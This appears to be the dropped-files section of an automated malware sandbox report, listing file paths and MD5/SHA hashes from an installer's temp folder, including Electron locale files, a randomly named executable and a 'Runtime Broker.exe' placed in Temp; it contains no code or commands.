C:\Users\Admin\AppData\Local\Temp\nscCC0B.tmp\7z-out\locales\ko.pak

MD5 9aac8193c75c1acbec944830d4dce9cb
SHA1 09258aab2f6e6232c3b321b8a5da13129358d71a
SHA256 c8c5c559b1dfae7760a3d98f926a6e1890516bb48a48c0bf48c8f7aa8df0e2f3
SHA512 2442ae3cb830e303c63ab9c188d57d6d3f5fa07efa7ba3ef0e64b309fe71391d56c8874ddb3b8f7cb2bcb5bed5375754337df4178569884d04df76dfacff8d9a

C:\Users\Admin\AppData\Local\Temp\nscCC0B.tmp\7z-out\locales\kn.pak

MD5 56dc5b7e8e5908e0b0b493e7da9c40ba
SHA1 a2a76bba65ac994252a9de780880d3e3fa460f54
SHA256 a30c7857a6fbb0a0899293683081db6d300715e73b65f2e5996af68090080eaa
SHA512 1d186d30bcd561725a0be32e9c255f45176807ca458c5010b0a8e489bb58bef707d816325d4d7356413fd6b168bf668da5da076b8f876f1bec23719f849af2ee

C:\Users\Admin\AppData\Local\Temp\nscCC0B.tmp\7z-out\locales\ja.pak

MD5 68dbcee0a337f20b0708c405de6b601a
SHA1 471112dbdaf30c4886a54fb2c49480f1660bb969
SHA256 81fb7f2ef457584614c951a5e0026b0b18daba16c7a3a39d04032a8310a163ed
SHA512 f559888b5aca3a7d40ef6f71ba59a78ac360c71e944f4dbdfde612b6ec21c2ad0f2f66f03eb5c60183cfed45984e88ee49528bd0b98feba7a423c20652269b5a

C:\Users\Admin\AppData\Local\Temp\nscCC0B.tmp\7z-out\locales\it.pak

MD5 d58a43068bf847c7cd6284742c2f7823
SHA1 497389765143fac48af2bd7f9a309bfe65f59ed9
SHA256 265d8b1bc479ad64fa7a41424c446139205af8029a2469d558813edd10727f9c
SHA512 547a1581dda28c5c1a0231c736070d8a7b53a085a0ce643a4a1510c63a2d4670ff2632e9823cd25ae2c7cdc87fa65883e0a193853890d4415b38056cb730ab54

C:\Users\Admin\AppData\Local\Temp\nscCC0B.tmp\7z-out\locales\id.pak

MD5 7b39423028da71b4e776429bb4f27122
SHA1 cb052ab5f734d7a74a160594b25f8a71669c38f2
SHA256 3d95c5819f57a0ad06a118a07e0b5d821032edcf622df9b10a09da9aa974885f
SHA512 e40679b01ab14b6c8dfdce588f3b47bcaff55dbb1539b343f611b3fcbd1d0e7d8c347a2b928215a629f97e5f68d19c51af775ec27c6f906cac131beae646ce1a

C:\Users\Admin\AppData\Local\Temp\nscCC0B.tmp\7z-out\locales\hu.pak

MD5 bd746a6c66981df9393daaebf8e9fa4a
SHA1 921ecd3082c27202acbb6f28abaae8f5bece3382
SHA256 742c31c64adc6474274cbdf86857b381dc25a0bffacdc42e0e9fad8ea7d37288
SHA512 d1d1428dadaf22aa149644520c4bb32dbd0bf087e3ca7ee3d2cf96b28ae7db3f6156bd52886f260e4d0d4c6bd085f0a6ebeeafdf5a4e227bc5b59a960562f829

C:\Users\Admin\AppData\Local\Temp\nscCC0B.tmp\7z-out\locales\hr.pak

MD5 fd856bb898e8d0f0f1fbdf6c06ee47ff
SHA1 33febdb5a84aa06c92bfe37a32c88fd58ea82578
SHA256 01bb4d899a8cc281f27f67679eef1bf3e809cd9a6cdb6c5eace0563b7eb732d4
SHA512 545696066d5b44c8f2d9839288e05d0c933f8ae8b233a8ecddf48e59ca18c9c2b4cf1029915f261251794bcc04ac79b1a64ca9ed99883461438ace04fe2a0a37

C:\Users\Admin\AppData\Local\Temp\nscCC0B.tmp\7z-out\locales\hi.pak

MD5 643ea3b1dbd2f33bdddec6bbac7873d6
SHA1 5d1124d7993b9441b0424d1f3e654809d49e1445
SHA256 207c8c8d39a846f34c0a9ea5850901dbb28a8b0561293e8076ec1f51b5f5c2da
SHA512 7b3378aae6d1a592e2ef60b659c4886c6e9afefdfd6954836d3260c61faa0b15c7066deb7e5f31bb6bf24e0263651017fe3edaf99bb78a58b40a51ea2b29abb5

C:\Users\Admin\AppData\Local\Temp\nscCC0B.tmp\7z-out\locales\he.pak

MD5 6d689998ea9dc4ad6c769bf2ad715b33
SHA1 1f9f51b95e03e0636f4572f73cf93e3c49e2746a
SHA256 fc1d7fcc53c68254c1756eabc5a0942170c927a5166b5e25d34d7dd693bb1180
SHA512 e7a8641375a5b1556e75b7d883da3e23957b0e8331c93738cfd579bbe25565df246750d648f9775517a4cb4e6c9cfd5b0e2a637a80933d7385a72bf2332e5815

C:\Users\Admin\AppData\Local\Temp\nscCC0B.tmp\7z-out\locales\fr.pak

MD5 0bf28aff31e8887e27c4cd96d3069816
SHA1 b5313cf6b5fbce7e97e32727a3fae58b0f2f5e97
SHA256 2e1d413442def9cae2d93612e3fd04f3afaf3dd61e4ed7f86400d320af5500c2
SHA512 95172b3b1153b31fceb4b53681635a881457723cd1000562463d2f24712267b209b3588c085b89c985476c82d9c27319cb6378619889379da4fae1595cb11992

C:\Users\Admin\AppData\Local\Temp\nscCC0B.tmp\7z-out\locales\fil.pak

MD5 3165351c55e3408eaa7b661fa9dc8924
SHA1 181bee2a96d2f43d740b865f7e39a1ba06e2ca2b
SHA256 2630a9d5912c8ef023154c6a6fb5c56faf610e1e960af66abef533af19b90caa
SHA512 3b1944ea3cfcbe98d4ce390ea3a8ff1f6730eb8054e282869308efe91a9ddcd118290568c1fc83bd80e8951c4e70a451e984c27b400f2bde8053ea25b9620655

C:\Users\Admin\AppData\Local\Temp\nscCC0B.tmp\7z-out\locales\ru.pak

MD5 1ac53d0f56122ba50aece13809212499
SHA1 b269fd26024c4b4237a7d0dfc38fe7d6ed7cf968
SHA256 d4631eaeae36991c09d4091876167ce661de2d5185f15bfe5d3774eb3143acd4
SHA512 37b85c0d59f1688653ac0524d42da03d71176608f73a54674094f82b1192835a093978c0d7286a3adda8c0ffcedfecd11072ab3bcc7175096fa49439f0460ad6

C:\Users\Admin\AppData\Local\Temp\nscCC0B.tmp\7z-out\locales\ro.pak

MD5 0e0038eecaf924b260e9a1efff2f4d7b
SHA1 68d5286a18f4c1d8c8f8c12f658096a588dcf865
SHA256 d513cd40ba6188fa5880983669ae444aee4e914cc3a5943670e505cfae2b3980
SHA512 0bd0bfaf11b1bedef1fcdf7c9b885fa059a5a21e2202976cdbd918559d39dac433aa3d583fbff0b047ce2664bda1b206943c3748a9a3da3642d1dae02d9f2260

C:\Users\Admin\AppData\Local\Temp\nscCC0B.tmp\7z-out\locales\pt-PT.pak

MD5 df374b43d1dda2b8b1d931a4c6ed1c77
SHA1 337e9982e24d49375f77b1822176c65d2e6ef0dd
SHA256 2c88481346e46ff7326464e462c3f87a93e15ae239801335ac6a799899634d40
SHA512 b0695d4d814959d4ac937f5ac5e815a6cbbbfc6fe4a0967e789a24fbdda8c1a590a1b47e5dc163a4a2f6a64190b09de150b90a3e720b5004f3b7de084222d420

C:\Users\Admin\AppData\Local\Temp\nscCC0B.tmp\7z-out\locales\sl.pak

MD5 a7c93a7af81ebef71df05292aa240035
SHA1 73faaac04cc76d05f498b6682a488c2639816fbb
SHA256 f195e781dbaa4c53c9283a9a88229ecf6affe4f9f71a092e34c428678d27a1ed
SHA512 547f088deaba4b92c57e7c905e68e8583f8a347280f717e6a553612d60990af499c42c4ba2eea3a9183b303d072ad2bfa5d635e82cbdc7b3db0afff14227890b

C:\Users\Admin\AppData\Local\Temp\nscCC0B.tmp\7z-out\locales\sk.pak

MD5 d2b70dc314a2068ee33e6c38cbc17815
SHA1 6aaa0185c30db86dc2487368ae25cf107892faa5
SHA256 1186bb86257aead486fd26ecb13ddfcb5dae55ccb5280af36540441c28ce0b9f
SHA512 9b47ce328c22815baa76797369c3ba6276b48e304f3f5ac905c875294c9a469f99e42b9744415d72539514686c939abf606690b1533cb841523368912d24c2d1

C:\Users\Admin\AppData\Local\Temp\nscCC0B.tmp\7z-out\locales\pt-BR.pak

MD5 a9f68bf4a054a26089c3075e892eeb06
SHA1 c7967ea50a422e068da5a22889ea9cdc0fc4c184
SHA256 5bd25f428cacabd83cd70563e03bc6be7b8da190176afaac757ce5ef00e2dd06
SHA512 8115b15e88e2cf8c062274e319cdf124b6e75cbb76f1b207d2e6db20e2536297587bc2083440cbfb5a222599f31de944a926737db78231e8b82e6206c374b46e

C:\Users\Admin\AppData\Local\Temp\nscCC0B.tmp\7z-out\locales\pl.pak

MD5 755517d2a388d08a6bbd874c91ab7bc7
SHA1 84604fff5b010ad4219a9b3b970699d8dc9c9004
SHA256 ce6232f71a2d6db38f1fc230c93782b95925c8ec50014baf9199b45478002592
SHA512 ae41122b3afadfce48a594299b444763450d8a1621b908643f076e8c9361d1dd6a4d7c80c013d7d53bf32be879fbcf58228b2aea4f2d7c26e743811566a88a92

C:\Users\Admin\AppData\Local\Temp\nscCC0B.tmp\7z-out\locales\sr.pak

MD5 1e439bda324311b06f82382e35ba1dcd
SHA1 c10311e16367951544e54d051137711b907da83e
SHA256 b68725b6ddb56159dc384dd6c02c3c0f7230837feb92256516810c83a170ffd6
SHA512 1fbd958cf83906ddac4c3d85d2c5a3d6f43226fd9c59020e93250d3b8cdadafe16e672cfd61b579daff27dfc0b22ffa137933904642f27ed01f855ed0cc63804

C:\Users\Admin\AppData\Local\Temp\nscCC0B.tmp\7z-out\locales\nl.pak

MD5 d429c3de98fe63eacf584e74f449c848
SHA1 6bb6aacb358347626e415eaa84a59af4b7d6fa31
SHA256 f8479ef743c76c8af0d9774290d8c0499728d3fe9759bb80bc46fee459923147
SHA512 10e49fe4ecb6702a6befb598aa2574a1f1ad6b9495b5a0591167b075df797f9b95062b4851949c616f894fca5acec79e85323d1e9511da9a7f4133ead4250e2e

C:\Users\Admin\AppData\Local\Temp\nscCC0B.tmp\7z-out\locales\fi.pak

MD5 d4b776267efebdcb279162c213f3db22
SHA1 7236108af9e293c8341c17539aa3f0751000860a
SHA256 297e3647eaf9b3b95cf833d88239919e371e74cc345a2e48a5033ebe477cd54e
SHA512 1dc7d966d12e0104aacb300fd4e94a88587a347db35ad2327a046ef833fb354fd9cbe31720b6476db6c01cfcb90b4b98ce3cd995e816210b1438a13006624e8f

C:\Users\Admin\AppData\Local\Temp\nscCC0B.tmp\7z-out\locales\fa.pak

MD5 a61520f471e8cda8c420bad38e6fd140
SHA1 d4acd59df0f788d098ea104fa604c34aea670725
SHA256 1b9a9883731be040d58ae1641fc9122b9e0332e4a5904c43cae787ed82880a26
SHA512 899e6faab74a231f39b7082310f8c613c246a8bf377482efa098846a0732d9873f210aa7513c1640229866ff54e0e54c220e299698752ef8366dbf318abef8e6

C:\Users\Admin\AppData\Local\Temp\nscCC0B.tmp\7z-out\locales\et.pak

MD5 a94e1775f91ea8622f82ae5ab5ba6765
SHA1 ff17accdd83ac7fcc630e9141e9114da7de16fdb
SHA256 1606b94aef97047863481928624214b7e0ec2f1e34ec48a117965b928e009163
SHA512 a2575d2bd50494310e8ef9c77d6c1749420dfbe17a91d724984df025c47601976af7d971ecae988c99723d53f240e1a6b3b7650a17f3b845e3daeefaaf9fe9b9

C:\Users\Admin\AppData\Local\Temp\nscCC0B.tmp\7z-out\locales\es.pak

MD5 a36992d320a88002697da97cd6a4f251
SHA1 c1f88f391a40ccf2b8a7b5689320c63d6d42935f
SHA256 c5566b661675b613d69a507cbf98768bc6305b80e6893dc59651a4be4263f39d
SHA512 9719709229a4e8f63247b3efe004ecfeb5127f5a885234a5f78ee2b368f9e6c44eb68a071e26086e02aa0e61798b7e7b9311d35725d3409ffc0e740f3aa3b9b5

C:\Users\Admin\AppData\Local\Temp\nscCC0B.tmp\7z-out\locales\ta.pak

MD5 561cd5077ae72c63ecc2cdd467bfabdd
SHA1 2c5ef5d96a3c65e51c6a4c39292f6d2b71df7d1a
SHA256 986c7509c5024d44d82f5cd83cdc9d1d62adeaae1362f98f9ea8ccd22eb9ab1a
SHA512 133d73b6ef6261d250598b0837a4a11a51173d8d4fc24231eae1fd155a30834b0696a5996cb987324b32e40513e02c45a79bfe5a687db44e977a5d52cf4aa178

C:\Users\Admin\AppData\Local\Temp\nscCC0B.tmp\7z-out\locales\ur.pak

MD5 5f536e7503027daf06b80f275ec6637c
SHA1 a141a8ec8c7ce3e6ef1ebaf571fae53995ffaec5
SHA256 8d0f93dc26d7acd05d9c90509eaad322fc9fdab568950fe3a426e9f350971e98
SHA512 5285068591aafcf5bc5c60224e8a77ff0d0d69b7ea10d07e21a656ca52fab12132a925d79a0780800a2f5f3dd7402df9b125c1aaab132459e9aafc8ff89db75c

C:\Users\Admin\AppData\Local\Temp\nscCC0B.tmp\7z-out\locales\zh-TW.pak

MD5 e2ff83c0e2155c0dc8a9f142008c4bc7
SHA1 42772f4f68fa3cbef17546189e659551caff473d
SHA256 02a327980459dc68f717dc7576d8e1af31e578b012dc6852421455f48a930f57
SHA512 fbf9e0517aac4a43cd298728af98312760f3260aa185fdf5ba89d4c3057f5e8805b9d0b6ecd7c5ba44943aed351b1e2912e4515ac1371059ce68d4dfbc888743

C:\Users\Admin\AppData\Local\Temp\nscCC0B.tmp\7z-out\locales\zh-CN.pak

MD5 6af1d3a0d871a606fe1ace453eb33603
SHA1 0971d46bea6ed92b8bb94219bc5bc6770e7f98d7
SHA256 cf8ed83714e7570094ab6512124e17d189a3d2ada1b1f60faaad7ea2b282fcf7
SHA512 959f5ca23a82fabf0aa7cedc695a95bc12d24cfc0ad7ca4f7f82f28f23caaa2db1a8f2d7d0f1bd8308a43d11ea02760d557821183306618744f56739ff570edb

C:\Users\Admin\AppData\Local\Temp\nscCC0B.tmp\7z-out\locales\vi.pak

MD5 887e3f4b6206b54fdff0909759f73f66
SHA1 a86ed9c04991d916df1aa4d18eff7544b06f98dc
SHA256 3e189a6eb5bc8ba334d69982f204e27956d109da5f121c17a0b0232ff366bb77
SHA512 129971485ea5c91be9361ad94ca79fd105e4ad6eeae5b09f028f53e3968d5e8c544d670c47596fc98b3ae4d584e53fbe075c5bf5596edae7a21fc8626a3ee9bc

C:\Users\Admin\AppData\Local\Temp\nscCC0B.tmp\7z-out\locales\uk.pak

MD5 ee70e9f3557b9c8c67bfb8dfcb51384d
SHA1 fc4dfc35cde1a00f97eefe5e0a2b9b9c0149751e
SHA256 54324671a161f6d67c790bfd29349db2e2d21f5012dc97e891f8f5268bdf7e22
SHA512 f4e1da71cb0485851e8ebcd5d5cf971961737ad238353453db938b4a82a68a6bbaf3de7553f0ff1f915a0e6640a3e54f5368d9154b0a4ad38e439f5808c05b9f

C:\Users\Admin\AppData\Local\Temp\nscCC0B.tmp\7z-out\locales\tr.pak

MD5 3a858619502c68d5f7de599060f96db9
SHA1 80a66d9b5f1e04cda19493ffc4a2f070200e0b62
SHA256 d81f28f69da0036f9d77242b2a58b4a76f0d5c54b3e26ee96872ac54d7abb841
SHA512 39a7ec0dfe62bcb3f69ce40100e952517b5123f70c70b77b4c9be3d98296772f10d3083276bc43e1db66ed4d9bfa385a458e829ca2a7d570825d7a69e8fbb5f4

C:\Users\Admin\AppData\Local\Temp\nscCC0B.tmp\7z-out\locales\th.pak

MD5 2c41616dfe7fcdb4913cfafe5d097f95
SHA1 cf7d9e8ad3aa47d683e47f116528c0e4a9a159b0
SHA256 f11041c48831c93aa11bbf885d330739a33a42db211daccf80192668e2186ed3
SHA512 97329717e11bc63456c56022a7b7f5da730da133e3fc7b2cc660d63a955b1a639c556b857c039a004f92e5f35be61bf33c035155be0a361e3cd6d87b549df811

C:\Users\Admin\AppData\Local\Temp\nscCC0B.tmp\7z-out\locales\te.pak

MD5 15704c3b9124ec3ffefc4f1bc969e778
SHA1 be4ab1b073f4aec2849f1851eb23a30298dda21a
SHA256 41a7fb65b3a1898b8c38f75fdca96e54f9f571e78c943242c647a24dbe0e0107
SHA512 c21825ecc96f1b056a0bb1799c3497bba63aa6c0898f648600d47ba7e5f7f9af3fa802e6ea36fa08afdd47e775b91d21f80645128d88198da4e2c597a985cc8b

C:\Users\Admin\AppData\Local\Temp\nscCC0B.tmp\7z-out\locales\sw.pak

MD5 39277ae2d91fdc1bd38bea892b388485
SHA1 ff787fb0156c40478d778b2a6856ad7b469bd7cb
SHA256 6d6d095a1b39c38c273be35cd09eb1914bd3a53f05180a3b3eb41a81ae31d5d3
SHA512 be2d8fbedaa957f0c0823e7beb80de570edd0b8e7599cf8f2991dc671bdcbbbe618c15b36705d83be7b6e9a0d32ec00f519fc8543b548422ca8dcf07c0548ab4

C:\Users\Admin\AppData\Local\Temp\nscCC0B.tmp\7z-out\locales\sv.pak

MD5 502e4a8b3301253abe27c4fd790fbe90
SHA1 17abcd7a84da5f01d12697e0dffc753ffb49991a
SHA256 7d72e3adb35e13ec90f2f4271ad2a9b817a2734da423d972517f3cff299165fd
SHA512 bd270abaf9344c96b0f63fc8cec04f0d0ac9fc343ab5a80f5b47e4b13b8b1c0c4b68f19550573a1d965bb18a27edf29f5dd592944d754b80ea9684dbcedea822

C:\Users\Admin\AppData\Local\Temp\nscCC0B.tmp\7z-out\locales\es-419.pak

MD5 7f6696cc1e71f84d9ec24e9dc7bd6345
SHA1 36c1c44404ee48fc742b79173f2c7699e1e0301f
SHA256 d1f17508f3a0106848c48a240d49a943130b14bd0feb5ed7ae89605c7b7017d1
SHA512 b226f94f00978f87b7915004a13cdbd23de2401a8afaa2517498538967df89b735f8ecc46870c92e3022cac795218a60ad2b8fff1efad9feea4ec193704a568a

C:\Users\Admin\AppData\Local\Temp\nscCC0B.tmp\7z-out\locales\en-US.pak

MD5 5e3813e616a101e4a169b05f40879a62
SHA1 615e4d94f69625dda81dfaec7f14e9ee320a2884
SHA256 4d207c5c202c19c4daca3fddb2ae4f747f943a8faf86a947eef580e2f2aee687
SHA512 764a271a9cfb674cce41ee7aed0ad75f640ce869efd3c865d1b2d046c9638f4e8d9863a386eba098f5dcedd20ea98bad8bca158b68eb4bdd606d683f31227594

C:\Users\Admin\AppData\Local\Temp\nscCC0B.tmp\7z-out\locales\en-GB.pak

MD5 d59e613e8f17bdafd00e0e31e1520d1f
SHA1 529017d57c4efed1d768ab52e5a2bc929fdfb97c
SHA256 90e585f101cf0bb77091a9a9a28812694cee708421ce4908302bbd1bc24ac6fd
SHA512 29ff3d42e5d0229f3f17bc0ed6576c147d5c61ce2bd9a2e658a222b75d993230de3ce35ca6b06f5afa9ea44cfc67817a30a87f4faf8dc3a5c883b6ee30f87210

C:\Users\Admin\AppData\Local\Temp\nscCC0B.tmp\7z-out\resources\app.asar

MD5 611eaf12452ea9d4260ced5475d13085
SHA1 0d1596e8932696a38a836210117a025d1e21ce62
SHA256 dbd49ed81897121d0ad933260d2930b35b80aef8814a244c6ffc657022ce5fa0
SHA512 be0aa6e9606858d77774199869c4b33e477a95be787d7c7f5c807f223183a6e0b24772fa569ff75a7a052bcaea47a38e775984c11493d89d111e0423c1af042b

C:\Users\Admin\AppData\Local\Temp\nscCC0B.tmp\StdUtils.dll

MD5 c6a6e03f77c313b267498515488c5740
SHA1 3d49fc2784b9450962ed6b82b46e9c3c957d7c15
SHA256 b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e
SHA512 9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803

C:\Users\Admin\AppData\Local\Temp\nscCC0B.tmp\7z-out\resources\elevate.exe

MD5 792b92c8ad13c46f27c7ced0810694df
SHA1 d8d449b92de20a57df722df46435ba4553ecc802
SHA256 9b1fbf0c11c520ae714af8aa9af12cfd48503eedecd7398d8992ee94d1b4dc37
SHA512 6c247254dc18ed81213a978cce2e321d6692848c64307097d2c43432a42f4f4f6d3cf22fb92610dfa8b7b16a5f1d94e9017cf64f88f2d08e79c0fe71a9121e40

C:\Users\Admin\AppData\Local\Temp\b80jkhkfdda23kjlkh2.exe

MD5 44b97613cefd878fac28459174d316d4
SHA1 442361b66a7bb21f40798fb0da63c05de92b9471
SHA256 54cc44e30733b5a24a50c75af0222ed27046ed8ca4988049712b2b1c9ed231af
SHA512 29c5eab63beb93edd5b1ffe3d5f1a35414f5ae0a68367190cd2749e7ac0977c89266f896353940bbd95e1e21bef7fcd8e93917c694e37305ce2be5deed56a6fe

memory/3048-804-0x0000000000400000-0x0000000000412000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d930346e97ba8b321c25e061b217c7ab
SHA1 e9231cbb9006d33801af1ef10d5992ee6155c296
SHA256 0e2a0132cbf0e4934aa82511541fb319fd905aa6fd5f970cd0ca79085ab3c9e3
SHA512 76c5ca967440da012d3601931247b557e74b851697e63bc3eaa1121829156331ea3bc27e933530189cba2a4c30390d2656ad2b2b17f8f65245d6c03e9cecd26e

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 9faf6f9cd1992cdebfd8e34b48ea9330
SHA1 ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e
SHA256 0c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953
SHA512 05b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97

C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\ffmpeg.dll

MD5 4941e1fb511e94425412484ff769ddfd
SHA1 70d034f0f2baa960cf94904f49ceac7007a0fd40
SHA256 85603b2022fb69580b353e46cab61e4d6192b680829916f2bb9133bb0711e49b
SHA512 e8239885e1d6988a15e35f99a765a6feffefde8c5215a3ac0d78f61a27876f03c5dd3983d5ce402f41d2a0ae5a7ab0b1111edf04d71fb7e3fea78748c0adcaf3

C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\ffmpeg.dll

MD5 2d8e568fbb90874cf0cd7c7522887136
SHA1 7c50de96e4c3134960768dfdee0f878e09ceaa36
SHA256 2afad3df944a9538f4359589ad7c34c8efbb3c2cc56fd57d375231b9f1297d98
SHA512 c7d556467b750f8882dabc2de65e1cd5fc2c3a7ce3136ce17e76baee458b3d5feec0679f0006cce619191c2559b829130aa018b98eec967cba1afd1fbe4fd956

C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe

MD5 94364e709e706142ee22af452c2e9db6
SHA1 a941bcfd68ddf3bd51341ef1f42e649d2f895d6d
SHA256 5f96c8eca3a8af12acceb62454a093e16dbc23363b5a5a0a68aa7a4af9037faa
SHA512 23df88e3809bf331eb215c1ed9c3a3e84210cef3211b8d617e1b5d36f9f55e1895ca3a61f3fdf558a11fb28e1f132dabe69ea49cd36d606bbb664efd5265a80a

C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\icudtl.dat

MD5 c0d49f8fcfed2a03d5cff9ce220b4555
SHA1 a4629d43ac0ef42a8cee764b64feeb4cb8fcd37b
SHA256 f994527c431e613dce9b796d25f44becb7706558fe2cf4e04d6ee80b9d46c5b1
SHA512 504a1919e12f4d43e45e09d6620d45ace9829e7f23765572eab51c31cbfaa0a601f062d116603ee5a4c779b32bf55fdf350ee44053df501501453248a7ab3876

C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\resources\app.asar

MD5 950eb5b84a8185efd69169e3554235a0
SHA1 ba2348102d0a922024d2367dfc4524ba6e482d04
SHA256 59d932133fd0759a9f4987e13bd0a926368b3f9c7b0c3310ba23d98fab1bf7e7
SHA512 708e3dc8040ef3737f9601ec76404538d50689302ba36cbfd93d6e8cb85f24ee5d0f5027da0a5c25022525910b1fdaaffb354b7835ec21167afbb7841d890667

C:\Users\Admin\AppData\Local\Temp\125af51a-7980-4988-be4a-7aa9e6c7311f.tmp.node

MD5 d99022b14dce5b211a8d739e245c5209
SHA1 5d1cede92b0386098545886f69548684071bff6b
SHA256 50d9eac47cc94f244e2d94fbbfd0affa436b43f938a7d6c14a9280ba0a09368f
SHA512 8961e27573c73808e5ad333a00f188b5ebe38ed4cd42b87508d7e4a23f062143306bfb889319a3b48a2dee942ed396d2226a9d40c8ad3c89a0c1c7a5aa98053d

C:\Users\Admin\AppData\Local\Temp\32918c3f-c719-4157-92aa-1e9d86fb3187.tmp.node

MD5 e2b2dede9c9f478e489e97782f939f2c
SHA1 8c9e34d66350b60802dc04a0fa256ca3e7e89e54
SHA256 e6bcf7921b8cad989ce2d8c8f3dea79507526c79da8e01ef4af31a7f1ddc87df
SHA512 bafd8b45a769ba9e312f856472146b4acc75dff786f43c362808ed97d1e762a70d23c3af6ef75e7c06af8190ff04b016270a639aaafe5b9d5ff7f9a767b0be28

C:\Users\Admin\AppData\Local\Temp\4f2c2afc-b908-4228-8f6b-c3ddfa11ab01.tmp.node

MD5 912a98f113e2853cdf8753a567ef3afa
SHA1 73a3fddc8eb91035ce583087aa60882b8272dc6b
SHA256 7164cb77c3530f083a516b74ef3e08385bc7b2168906ae741a1dccfb2c7dc48e
SHA512 af961a35013c1387a1e2376fe4517c67144a212afa37cf84c3cd840d1d8bb4333fc54c1b2c289d88f35d656c62f8b382deca461b7a3c805948c91d866b03f0ce

C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\resources.pak

MD5 53106057f4f680daaf14930099d59f87
SHA1 beff92808626ca60931e66f8af8f2543a782e922
SHA256 544f70e46dbedb15003031f3cd166bee1a66e8528ee1f0c4f6f5c0d59072a1f6
SHA512 c9752a6bd7a5afb9894bea93d8d6eb2edad4064c928ace09be86d397d1fef6bb5ebd687cf36d12ae689b7067eecbf786e9550bc39c6e3103b6d29ccbc5d2eb72

C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\ffmpeg.dll

MD5 d5507183bbfc7f217d9e1ef2c9ecf5f5
SHA1 4c4bc1308077fa11b714424ab1ed8f74ad9fd68a
SHA256 15ec56ae2d0b3a8b6ec5f77fe156e5941b35a90a58df6f70b96867c504d07dfa
SHA512 5311eec197aca5747bb3238207435a8463ce924ea7edf3df2e109a766420a1c1c34301baacd3a98cefca9efde56034f667e6f4da1bc4a265012123cc5a45a6ff

C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe

MD5 f6084c097e6747ee01532c83dbb599df
SHA1 aed1187445eaeb2310e5ea6fb02c08db488c82ed
SHA256 009123fc8eda068ae1369cdf0769b16655de6d6085a3ff1f0da4f6ebc395eebf
SHA512 38058df2bf3878c4e2f9ccfb0f891f6866846c4e7b88dba8c939fde980302ed5fb70b3b871d320349829d2a66fd216d4e737ca7e9f04dd94770223298c236ed9

C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\Runtime Broker.exe

MD5 e218a671517d174072f6c7a4fb42ea85
SHA1 a9298b0797ee237cc4895486b616b8d4e4ff744a
SHA256 794a0a66735f51a32edb525015ac950817f8a3eefda1706309a34da123849091
SHA512 98385fd6e644a5c8cd07dc24860d46d456c535a0b441fb40b778d00a53cadf66dec86166fd2bfd6637b431390c951fe2fd68ededcd0dda0ea7f2363803e166f8

C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\libEGL.dll

MD5 cceb4790b38f1f43b440089cf120b457
SHA1 cdc1369f05d9e351f461411c72623d37469837d3
SHA256 8487e01edb76cc4c362fcf41c31a21a9df246d9b598239481259a79e5f452308
SHA512 6950fcf1acde776bb343817b8769e9dec12e9033e620a33d06432913b100a665a6e4a6ee90438184aa0300f7ae93fba1fd3b782fd3ec04d2ce1406ce5c682749

C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\libegl.dll

MD5 743b49f7d69ebbc62ef08a3a1a717e8d
SHA1 41c7d3b12c1aca3aac5c6f7f2ad97e8ea2ddd596
SHA256 6065fe7773c1dbd9278057c21efa383889d0b1bbcc2dacdf30c909a7a6185349
SHA512 682d4e0623ed3c94a99b84ebbe6304014e430e0c6da8e81b506fb7043089f11ed8f8a7ddcdae1a92edf19bc684e2ada9f9433454fac8d4eb8677b313ad007788

C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\libGLESv2.dll

MD5 b3a8a7971b87e359278a5437cd70b761
SHA1 5e0b379724d0e27e502708f7076e0e9f7990365d
SHA256 dd289e09d593f6c7035e7ce988e242d5c4ea6bbb4daaa1e0fb05f242b1a846b4
SHA512 edfde18e2754293299d6825c278607159cedbd4230f0b5eb106ad5c9503de3de8426bcac89b63f0ef09f08b3928142a9ec445e5f33b5a0dd8156f25c8527d03c

C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\libglesv2.dll

MD5 4185b3f2e7cfcb07d7ab23c5728aeecb
SHA1 1072b5add3c1de0f373c034f99afe41c6101f4ab
SHA256 bbfaedfcefdfab3515de17108c89a65de09113fcb0ac94207db870ca49d17315
SHA512 630fb1e4a69388ccfa2c73b3cbf725d1122b3227738dde24e8ca2184670c77dd62fbe7209ec853d8cd49f65c5c2a9429802ba792f2023bbd50d866f644f2c4d7

C:\Users\Admin\AppData\Local\Temp\2ZPlJjJtuFrhfcpEALPwIHeS7dt\d3dcompiler_47.dll

MD5 5c44155144eb6d57fe836ebe1875fbb3
SHA1 bfe6c59807caebd379eabfdebc530677d7c0ecf3
SHA256 2316f6b8c21ed6bb4a887c8331c84eb07588501b4a63aeb25d5693e6d0eed8c7
SHA512 d7a1665d1370343b3c822d4610b7296f4366099770cd04560d3421fdb17ce46db4145ead2f56da82848f59cfcb0283ac18c982428345a5b2e46c2b236d906d13

